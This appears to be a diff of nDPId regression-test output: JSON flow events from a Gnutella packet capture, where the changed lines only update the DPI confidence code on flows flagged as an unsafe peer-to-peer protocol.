00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287444,"flow_last_seen":287781,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":4814,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287444,"flow_last_seen":287781,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":28681,"dst_port":4814,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":8658,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287652,"flow_last_seen":287652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":8658,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287649,"flow_last_seen":287958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"70.81.219.111","src_port":28681,"dst_port":19210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3457,14 +3457,14 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":28681,"dst_port":59384,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287697,"flow_last_seen":287697,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":9070,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287697,"flow_last_seen":287697,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":9070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"159.196.95.223","src_port":28681,"dst_port":2003,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287588,"flow_last_seen":287588,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"159.196.95.223","src_port":28681,"dst_port":2003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287510,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.22.22.94","src_port":28681,"dst_port":34245,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287510,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.22.22.94","src_port":28681,"dst_port":34245,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287511,"flow_last_seen":287824,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"180.218.135.222","src_port":28681,"dst_port":4548,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287511,"flow_last_seen":287824,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"180.218.135.222","src_port":28681,"dst_port":4548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287426,"flow_last_seen":287647,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.170.108","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287426,"flow_last_seen":287647,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.170.108","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287619,"flow_last_seen":287619,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.83.5","src_port":28681,"dst_port":9128,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3475,12 +3475,12 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287524,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":28681,"dst_port":44616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287698,"flow_last_seen":287698,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.91.30.216","src_port":28681,"dst_port":61635,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287698,"flow_last_seen":287698,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.91.30.216","src_port":28681,"dst_port":61635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287589,"flow_last_seen":287589,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":28681,"dst_port":64731,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287589,"flow_last_seen":287589,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":28681,"dst_port":64731,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":4364,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":4364,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287648,"flow_last_seen":287648,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":55050,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3507,7 +3507,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287320,"flow_last_seen":287320,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":28681,"dst_port":52660,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.10.174.159","src_port":28681,"dst_port":4841,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.10.174.159","src_port":28681,"dst_port":4841,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"209.204.207.5","src_port":28681,"dst_port":49256,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"209.204.207.5","src_port":28681,"dst_port":49256,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 